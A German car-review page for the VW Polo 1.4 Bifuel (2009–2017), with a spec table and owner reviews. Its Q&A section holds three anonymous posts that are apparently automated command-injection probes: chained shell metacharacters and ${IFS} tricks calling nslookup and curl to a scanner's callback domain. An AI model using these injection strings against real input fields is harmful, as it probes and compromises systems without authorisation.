12Gebrauchtwagen.de12Neuwagen.de

Unsere Partnerseiten:

VW Polo Schrägheck 1.4 Bifuel 86 PS (2009-2017)

Alle Erfahrungen

VW Polo Schrägheck (2009–2017) 1.4 Bifuel (86 PS)

5.0 von 5
DEINE ERFAHRUNGEN TEILEN

VW Polo Gebrauchtwagen Angebote

VW Polo Schrägheck (2009–2017) 1.4 Bifuel (86 PS)
VW Polo Schrägheck (2009–2017) 1.4 Bifuel (86 PS)

VW Polo Kleinwagen 2009 - 2017: 1.4 Bifuel (86 PS)

Ab jetzt geht es um eine der überzeugendsten Maschinen für den Polo Kleinwagen 2009, und zwar die 1.4 Bifuel (86 PS) von VW. Von den Fahrern wurde sie mit 4,9 von fünf Sternen bewertet. Für den Kleinwagen sind folgende vier Ausstattungsvarianten vorhanden: Trendline, Comfortline, Highline und Team. Alle Varianten sind mit 5 -Gang-Schaltgetriebe ausgestattet. Auf 100 Kilometern schluckt das Fahrzeug rund 6,1 Liter Gas.

Der Motor ist in die Schadstoffklasse EU4 eingeordnet – damit besteht auch freie Fahrt in Umweltzonen. Die genauen Angaben stehen in der Zulassungsbescheinigung Teil 1 oder im Fahrzeugschein. Beim CO2-Ausstoß muss man mit 146 Gramm pro 100 Kilometer rechnen.

Test und Nutzerbewertungen zeigen es und die technischen Daten sind ebenfalls ausgezeichnet: Mit dem 1.4 Bifuel (86 PS) ist VW ein sehr gutes Gesamtpaket gelungen, welches das Fahren zum Vergnügen macht.

Technische Daten

Ausgewählte Variante:

Technische Daten für VW Polo 1.4 Bifuel Comfortline

Auto-Symbol

Allgemeine Merkmale

Kraftstoffart
Benzin/Gas
Fahrzeugklasse
Kleinwagen
Karroserieform
Schrägheck
Anzahl Türen
5
Sitzplätze
5
Fahrzeugheck
Schrägheck
Bauzeitraum
2010-2010
HSN/TSN
0603/APO

Maße und Stauraum

Länge
3.970 mm
Breite
1.682 mm
Höhe
1.485 mm
Kofferraumvolumen
280 - 952 Liter
Radstand
2.470 mm
Reifengröße
185/60 R15 T (vorne)
Leergewicht
1.188 kg
Maximalgewciht
1.570 kg

Antrieb

Getriebarte
Manuelles Getriebe
Gänge
5
Hubraum
1390 cm³
Leistung
63 kW/86 PS
Zylinder
4
Antriebsart
Vorderradantrieb
0-100 km/h
12,7 s
Höchstgeschwindigkeit
177 km/h

Umwelt und Verbrauch VW Polo Schrägheck (2009–2017)

Kraftstoffart
Benzin/Gas
Tankinhalt
45
Kraftstoffverbrauch nach Herstellerangaben
6,1 l/100 km (kombiniert)
8,3 l/100 km (innerorts)
4,9 l/100 km (außerorts)
CO2-Emissionen nach Herstellerangaben
146,0 g/km (kombiniert)
Schadstoffklasse
EU4
Energieeffizienzklasse
k.A.

Fragen & Antworten

Anonym
4 Tage
&(nslookup${IFS}-q${IFS}cname${IFS}hitytjfrzrhym3c05c.bxss.me||curl${IFS}hitytjfrzrhym3c05c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitytjfrzrhym3c05c.bxss.me||curl${IFS}hitytjfrzrhym3c05c.bxss.me)&`'
Anonym
4 Tage
|(nslookup${IFS}-q${IFS}cname${IFS}hitwwexjrjjwaf66f2.bxss.me||curl${IFS}hitwwexjrjjwaf66f2.bxss.me)
Anonym
4 Tage
;(nslookup -q=cname hitnzfhtoujyw391fc.bxss.me||curl hitnzfhtoujyw391fc.bxss.me)|(nslookup -q=cname hitnzfhtoujyw391fc.bxss.me||curl hitnzfhtoujyw391fc.bxss.me)&(nslookup -q=cname hitnzfhtoujyw391fc.bxss.me||curl hitnzfhtoujyw391fc.bxss.me)

Nutzerbewertungen

5.0 von 5
(5 Bewertungen)
5
100.0%
4
0.0%
3
0.0%
2
0.0%
1
0.0%
0
0.0%
Sortiere nach:
Bewertung:
Inhalt:

5 Bewertungen

Anonym
5 Tage
Ich bin nun Besitzer eines VW Polo 6R seid mittlerweile 9 Jahren. Das der 1,4`er als bester Motor neben dem 1,6´er TDI zählt, muss man nicht weiter bestätigen. Für den kleinen Polo reicht die Leistung auch völlig aus, auch wenn er manchmal etwas durstiger ist. Das Fahrzeug gehörte vorher meiner Mutter und ist seid 2010 also mittlerweile 15 Jahre bei uns. Er macht eigentlich keine Probleme, hinten mal neue Stoßdämpfer , mal einen neuen Innenraumlüftermotor (Polo Krankheit) , mal einen neuen Endschalldämpfer und das wars dann eigentlich auch schon an Reparaturen. Der Rest wahr Verschleiß / Wartung .... mal die Bremsen neu nach 100 000km und wichtig ! An den Zahnriemenwechsel denken nach 100 000km oder 10 Jahren.... Sonst ein Tip Top KFZ, mittlerweile hat er 151 000km auf der Uhr und nimmt noch kein Öl. Meine Mutter fährt seit 2016 übrigens eine Polo 6C (also Facelift) mit dem 1,2´er TSI 90 PS. Funktioniert genau so gut ;)
0
0
Anonym
fast 9 Jahre
Ich habe seit 2014 einen Polo 1.4. 86 PS Style gefahren und kann dieses Auto nur empfehlen. Als ich ihn kaufte hatte er ca 20.000km weg, nun sind es knapp 80.000km. Ich fahre den Wagen jeden Tag 100km. In dieser Zeit hatte ich nie Probleme. Selbst die Nachrüstung einer Standheizung war kein Problem und diese funktioniert super. Verbrauch: 6-7 Liter je nach Fahrweise. Was mich etwas gestört hat ist die fehlende Motortemperaturanzeige und die digitale Tankanzeige.
0
0
Anonym
fast 9 Jahre
Das Fahrzeug lässt sich astrein fahren. Ich bin vor allem mit dem geringen Verbrauch, den kaum vorhandenen Wartungskosten und der Autobahntauglichkeit sehr zufrieden. Auf der Autobahn ist es für diese Autoklasse sehr ruhig und der Verbrauch von 4l/100km ist echt akzeptabel bei 130km/h. Das Design ist meiner Meinung nach sehr überzeugend und wirkt frisch und spritzig. Der Kofferraum bietet ausreichend Platz und auch die Beinfreiheit ist überraschend Großzügig für diesen Kleinwagen. In der Stadt und auf der Autobahn ist er gleichermaßen gut zu gebrauche, was mir besonders gut an diesem Auto gefällt.
0
0
martin_schaetzle
fast 9 Jahre
Volkswagen Polo ist ein toller Kleinwagen. Das Auto ist mit 1.4 Liter Hubraum und 86 PS ausreichend motorisiert. Der durchschnittliche Verbrauch liegt bei 5,1 Liter. Ich kann das Auto weiterempfehlen. Nur der Kaufpreis ist im Vergleich zur Konkurrenz etwas höher. Aber Aufgrund der guten Qualität und ist das Gerecht.
0
0
Anonym
mehr als 15 Jahre
Bin zwar nur den Polo V mit 69 PS gefahren würde aber eher Raten sich den Polo mir 85 PS kaufen da er kein 3 Zyl. ist und somit Runder läuft und somit auch besser Läuft. Die Qualität ist wie gesagt Top der Rest steht ja schon im 69 PS Polo Bericht. Ich Rate den Polo mit 85 PS.
0
0